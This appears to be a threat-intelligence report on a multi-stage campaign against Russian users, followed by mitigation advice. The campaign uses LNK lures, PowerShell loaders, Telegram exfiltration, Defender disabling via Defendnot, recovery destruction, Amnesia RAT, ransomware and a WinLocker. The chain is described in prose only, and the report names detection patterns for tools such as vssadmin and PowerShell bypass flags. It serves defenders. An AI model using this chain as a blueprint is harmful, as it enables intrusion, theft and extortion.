Multi‑stage malware campaign abuses legitimate tools and delivers ransomware and Amnesia RAT

The ICS CTI teams has identified a highly sophisticated, multi‑stage malware campaign primarily targeting users in Russia. The operation stands out for its extensive use of social engineering, abuse of legitimate Windows tools, and exploitation of widely trusted services such as GitHub and Dropbox for hosting malicious payloads.

The attack begins with seemingly harmless documents presented as routine work materials and quickly escalates to a full system compromise, involving espionage, the disabling of security mechanisms, deployment of backdoors, ransomware, and a WinLocker to completely lock the machine.

Social engineering as the entry point

The initial infection vector is a compressed file containing various fake documents, such as text files and spreadsheets with Russian names related to financial and accounting tasks. These files act as lures, reinforcing the appearance of legitimacy and increasing the likelihood of victim interaction.

Among the files in the package, a malicious shortcut (.LNK) disguised as a simple text document is the most notable. When executed, it launches PowerShell with the execution policy bypassed, downloading and remotely executing a script hosted on GitHub. No vulnerabilities are exploited at this stage — the attack relies entirely on user action.

Multi‑layered scripts and silent execution

The initial PowerShell script acts as a lightweight loader, responsible for hiding its execution, creating a decoy document with fake work instructions, and opening this file automatically to keep the user distracted. Meanwhile, the actual malicious execution occurs in the background.

As confirmation of success, the script sends basic information from the compromised system to the attackers via the Telegram API. After an intentional delay, it downloads a second‑stage VBScript, heavily obfuscated with commercial tools and custom encryption routines to hinder detection and static analysis.

This second stage works as the central orchestrator of the campaign, dynamically reconstructing the final code only in memory, using a combination of Base64 and RC4 before executing the real payload.

Privilege escalation and defense neutralization

Before proceeding to more aggressive actions, the malware checks whether it has administrative privileges. If not, it enters a persistent UAC elevation loop until elevated access is obtained.

With privileges secured, the campaign initiates a phase dedicated to neutralizing defenses. Microsoft Defender is progressively disabled through PowerShell commands, registry changes, and strategic deletion of widely used system directories. This process drastically reduces the ability to detect malicious files and behavior.

One of the most important aspects is the operational use of the Defendnot tool, originally created as a proof of concept to demonstrate weaknesses in the Windows Security Center trust model. The attackers use it to register a fake antivirus on the system, forcing Windows to automatically disable Microsoft Defender without directly stopping its services.

Espionage and information gathering

With defenses neutralized, the attack enters a reconnaissance and active surveillance phase. Detailed information about the system, user, hardware, and network is collected and sent to the attackers via Telegram.

Additionally, a module is deployed to capture screenshots of the victim’s screen at regular intervals for about fifteen minutes. The images are exfiltrated almost in real time, allowing operators to observe user activity and assess the target’s value.

System lockdown and removal of recovery options

To prevent any response or remediation attempt, the malware applies a series of restrictions to the operating system. Administrative tools like Registry Editor, Task Manager, Control Panel, and configuration utilities are disabled through registry policies.

In parallel, recovery mechanisms are destroyed: Windows Recovery Environment is disabled, backup catalogs are deleted, and all Volume Shadow Copies (VSS) are removed. These actions make system recovery extremely difficult without a complete reinstallation.

The attack also changes Windows file associations, preventing the opening of executables, documents, images, and several other formats. When attempting to open any file, the victim receives a message instructing them to contact the attackers via Telegram.

Amnesia RAT, ransomware, and WinLocker

In the final stage, the campaign delivers multiple high‑impact payloads. The main one is Amnesia RAT, distributed from Dropbox and disguised as a legitimate system file. The malware provides full remote control, extensive credential theft, Telegram session hijacking, browser data theft, cryptocurrency wallet theft, and continuous monitoring of user activity.

Next, ransomware derived from the Hakuna Matata family is executed, encrypting files with a custom extension and leaving ransom notes in Russian. The malware also terminates critical processes, changes the wallpaper, and implements clipbanker capabilities, altering cryptocurrency addresses copied to the clipboard.

Finally, a WinLocker component is activated, completely locking the system interface and displaying messages pressuring the victim to contact the attackers within a limited timeframe.

Final considerations

This campaign demonstrates how modern attacks can achieve full compromise without exploiting technical vulnerabilities, relying solely on social engineering, legitimate services, and native operating system features. The abuse of platforms like GitHub, Dropbox, and Telegram helps malicious traffic blend with legitimate activity, complicating detection and response.

This case reinforces the importance of monitoring unexpected changes in security configurations, system policies, persistence mechanisms, and anomalous use of administrative tools. Once defenses and recovery options are neutralized, the impact escalates rapidly and containment becomes extremely limited.

Mitigation and Defense Recommendations

• Block or restrict execution of .LNK files from user folders (Downloads, Desktop, Temp)

• Restrict execution of PowerShell and VBScript via AppLocker, WDAC, or equivalent policies

• Monitor PowerShell usage with parameters like ExecutionPolicy Bypass and Invoke-Expression (iex)

• Enable and monitor advanced PowerShell logs (Script Block and Module Logging)

• Detect and alert on changes to Microsoft Defender settings

• Monitor creation of broad directory exclusions in Defender

• Investigate unexpected registration of new security products in Windows Security Center

• Monitor usage of native administrative tools (vssadmin, wbadmin, reagentc, gpupdate)

• Monitor registry key modifications

• Detect massive changes to file associations in the registry (HKCR)

• Monitor creation and execution of .scr files outside legitimate contexts

• Ensure offline or immutable backups and test restoration regularly

• Prioritize EDR solutions with behavioral detection and automated response